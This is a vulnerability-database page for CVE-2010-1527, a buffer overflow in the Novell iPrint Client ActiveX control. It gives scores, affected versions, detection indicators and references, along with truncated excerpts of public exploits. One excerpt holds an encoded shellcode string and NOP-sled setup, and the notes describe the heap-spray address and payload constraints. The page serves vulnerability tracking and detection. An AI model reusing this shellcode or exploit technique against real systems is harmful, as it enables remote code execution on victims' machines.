CVE-2010-1527
published 2010-08-23CVE-2010-1527: Stack-based buffer overflow in Novell iPrint Client before 5.44 allows remote attackers to execute arbitrary code via a long call-back-url parameter in an…
PriorityP265critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
35.99%
98.3th percentile
Stack-based buffer overflow in Novell iPrint Client before 5.44 allows remote attackers to execute arbitrary code via a long call-back-url parameter in an op-client-interface-version action.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| novell | iprint | <= 5.42 | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
| novell | iprint | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Alert on HTTP responses containing the iPrint ActiveX CLSID combined with a 'call-back-url' parameter passed to an 'op-client-interface-version' action, especially with abnormally long parameter values. ↗
- →Heap spray pattern: look for repeated 0x0A0A0A0A dword sequences in JavaScript unescape() calls within HTML pages that also reference the iPrint ActiveX CLSID. ↗
- →Monitor for ienipp.ocx being loaded by iexplore.exe on versions 5.4.0.0 or 5.4.2.0 (file versions prior to 5.44); these are confirmed vulnerable versions. ↗
- ·The Metasploit module payload space is limited to 1024 bytes and null bytes (0x00) are bad characters; payloads must be encoded accordingly. ↗
- ·The exploit was confirmed working only against Novell iPrint Client 5.40 and 5.42 on Windows XP SP3 and Vista SP2 with IE 7; the single target uses a heap-spray return address (0x0A0A0A0A) rather than a fixed module address. ↗
- ·EXITFUNC is set to 'process', meaning the exploit terminates the browser process on exit; this may affect post-exploitation stability. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)
exploitdb·2010-09-21·CVSS 9.3
CVE-2010-1527 [CRITICAL] Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)
Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)
---
##
# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# novelliprint_callbackurl.rb
#
# Novell iPrint Client ActiveX Control call-back-url Buffer Overflow exploit for the Metasploit Framework
#
# Exploit successfully tested on the following platforms:
# - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3
# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows XP SP3
# - Novell iPrint Client 5.42 on Intern
Exploit-DB
Novell iPrint Client Browser Plugin - 'call-back-url' Remote Stack Overflow
exploitdb·2010-09-19·CVSS 9.3
CVE-2010-1527 [CRITICAL] Novell iPrint Client Browser Plugin - 'call-back-url' Remote Stack Overflow
Novell iPrint Client Browser Plugin - 'call-back-url' Remote Stack Overflow
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _
shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersiz
Metasploit
Novell iPrint Client ActiveX Control call-back-url Buffer Overflow
metasploit
Novell iPrint Client ActiveX Control call-back-url Buffer Overflow
Novell iPrint Client ActiveX Control call-back-url Buffer Overflow
This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42. When sending an overly long string to the 'call-back-url' parameter in an op-client-interface-version action of ienipp.ocx an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/40805http://secunia.com/secunia_research/2010-104/http://www.novell.com/support/viewContent.do?externalId=7006679http://www.securityfocus.com/bid/42576https://exchange.xforce.ibmcloud.com/vulnerabilities/61220https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11973http://secunia.com/advisories/40805http://secunia.com/secunia_research/2010-104/http://www.novell.com/support/viewContent.do?externalId=7006679http://www.securityfocus.com/bid/42576https://exchange.xforce.ibmcloud.com/vulnerabilities/61220https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11973
2010-08-23
Published